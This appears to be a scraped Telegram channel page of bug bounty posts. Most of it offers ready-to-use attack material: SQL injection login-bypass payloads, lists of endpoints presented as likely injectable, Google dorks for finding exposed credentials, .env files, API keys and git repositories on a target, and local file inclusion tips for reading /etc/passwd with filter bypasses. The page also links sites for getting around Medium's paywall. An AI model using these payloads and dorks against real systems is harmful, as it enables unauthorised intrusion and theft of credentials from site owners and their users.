Bug Bounty - GitBook
Open in Telegram
Everything 4 bug bounty https://t.me/GiftWay32robot?start=_tgr_HwZ24DI5MWJk
Show more7 430
Subscribers
+324 hours
+37 days
+16730 days
Posts Archive
7 431
Now SQL Injection - another Bypass Auth Payloads
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or 1=1--
or true--
" or true--
' or true--
")or true--
') or true--
' or 'x'='x
) or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
credit: @mamunwhh
http://GitBook_s.t.me
7 431
these sqli endpoint are most likely vulnerable:
.php:
1. index.php?category=<SQLi payload>
2. product.php?id=<SQLi payload>
3. news.php?article_id=<SQLi payload>
4. user.php?username=<SQLi payload>
5. login.php?username=<SQLi payload>&password=<SQLi payload>
6. search.php?q=<SQLi payload>
7. blog.php?post_id=<SQLi payload>
8. forum.php?thread_id=<SQLi payload>
9. profile.php?user_id=<SQLi payload>
10. admin.php?username=<SQLi payload>&password=<SQLi payload>
.asp:
1. default.asp?catid=<SQLi payload>
2. product.asp?id=<SQLi payload>
3. news.asp?newsid=<SQLi payload>
4. login.asp?username=<SQLi payload>&password=<SQLi payload>
5. search.asp?q=<SQLi payload>
6. blog.asp?postid=<SQLi payload>
7. forum.asp?threadid=<SQLi payload>
8. profile.asp?userid=<SQLi payload>
9. admin.asp?username=<SQLi payload>&password=<SQLi payload>
10. register.asp?username=<SQLi payload>&password=<SQLi payload>
.aspx:
1. default.aspx?catid=<SQLi payload>
2. product.aspx?id=<SQLi payload>
3. news.aspx?newsid=<SQLi payload>
4. login.aspx?username=<SQLi payload>&password=<SQLi payload>
5. search.aspx?q=<SQLi payload>
6. blog.aspx?postid=<SQLi payload>
7. forum.aspx?threadid=<SQLi payload>
8. profile.aspx?userid=<SQLi payload>
9. admin.aspx?username=<SQLi payload>&password=<SQLi payload>
10. register.aspx?username=<SQLi payload>&password=<SQLi payload>
.cfm:
1. index.cfm?catid=<SQLi payload>
2. product.cfm?id=<SQLi payload>
3. news.cfm?newsid=<SQLi payload>
4. login.cfm?username=<SQLi payload>&password=<SQLi payload>
5. search.cfm?q=<SQLi payload>
6. blog.cfm?postid=<SQLi payload>
7. forum.cfm?threadid=<SQLi payload>
8. profile.cfm?userid=<SQLi payload>
9. admin.cfm?username=<SQLi payload>&password=<SQLi payload>
10. register.cfm?username=<SQLi payload>&password=<SQLi payload>
.jsp:
1. index.jsp?catid=<SQLi payload>
2. product.jsp?id=<SQLi payload>
3. news.jsp?newsid=<SQLi payload>
4. login.jsp?username=<SQLi payload>&password=<SQLi payload>
5. search.jsp?q=<SQLi payload>
6. blog.jsp?postid=<SQLi payload>
7. forum.jsp?threadid=<SQLi payload>
8. profile.jsp?userid=<SQLi payload>
9. admin.jsp?username=<SQLi payload>&password=<SQLi payload>
10. register.jsp?username=<SQLi payload>&password=<SQLi payload>
7 431
If you are having trouble reading medium writeups, you can use the two sites below and read without restriction.
1. Readmedium.com
2. Freedium.cfd
7 431
Learn Authentication The Hard Way
Part l
https://www.andrew-best.com/posts/learn-auth-the-hard-way-part-one
Part ll
https://www.andrew-best.com/posts/learn-auth-the-hard-way-part-two
Part lll
https://www.andrew-best.com/posts/learn-auth-the-hard-way-part-three
7 431
Pentester Guide
A Comprehensive Resource for Pentesters: Tools, Methodologies, Scripts, Certifications, Learning Resources, Labs, Career Opportunities, Entertainment, and Freelancing Tips.Link: https://github.com/ZishanAdThandar/pentest/tree/main/notes
7 431
Useful Google Dorks that bug bounty hunters can leverage to find sensitive information: 👇🏻
1. Discovering Exposed Files:
- intitle:"index of" "site:target.com"
- filetype:log inurl:log site:target.com
- filetype:sql inurl:sql site:target.com
- filetype:env inurl:.env site:target.com
2. Finding Sensitive Directories:
- inurl:/phpinfo.php site:target.com
- inurl:/admin site:target.com
- inurl:/backup site:target.com
- inurl:wp- site:target.com
3. Exposed Configuration Files:
- filetype:config inurl:config site:target.com
- filetype:ini inurl:wp-config.php site:target.com
- filetype:json inurl:credentials site:target.com
4. Discovering Usernames and Passwords:
- intext:"password" filetype:log site:target.com
- intext:"username" filetype:log site:target.com
- filetype:sql "password" site:target.com
5. Finding Database Files:
- filetype:sql inurl:db site:target.com
- filetype:sql inurl:dump site:target.com
- filetype:bak inurl:db site:target.com
6. Exposed Git Repositories:
- inurl:".git" site:target.com
- inurl:"/.git/config" site:target.com
- intitle:"index of" ".git" site:target.com
7. Finding Publicly Exposed Emails:
- intext:"email" site:target.com
- inurl:"contact" intext:"@target.com" -www.target.com
- filetype:xls inurl:"email" site:target.com
8. Discovering Vulnerable Web Servers:
- intitle:"Apache2 Ubuntu Default Page: It works" site:target.com
- intitle:"Index of /" "Apache Server" site:target.com
- intitle:"Welcome to nginx" site:target.com
9. Finding API Keys:
- filetype:env "DB_PASSWORD" site:target.com
- intext:"api_key" filetype:env site:target.com
- intext:"AWS_ACCESS_KEY_ID" filetype:env site:target.com
10. Exposed Backup Files:
- filetype:bak inurl:backup site:target.com
- filetype:bak inurl:backup site:target.com
- filetype:zip inurl:backup site:target.com
- filetype:tgz inurl:backup site:target.com
7 431
https://t.me/RahaRM_Official
a personal channel covering topics like security, web development, programming and more
7 431
🔍 LFI Hunting Tips from Real Finds:
1️⃣ GET path injection: Try ///../../../../etc/passwd. Fuzz w/ Burp!
2️⃣ POST LFIs: Test endpoints like /router.jsp?../etc/passwd.
3️⃣ Hidden params: Brute-force w/ ParamSpider or check JS files.
💡 Bypass filters w/ %2e%2f or %00
Available now! Telegram Research 2025 — the year's key insights 

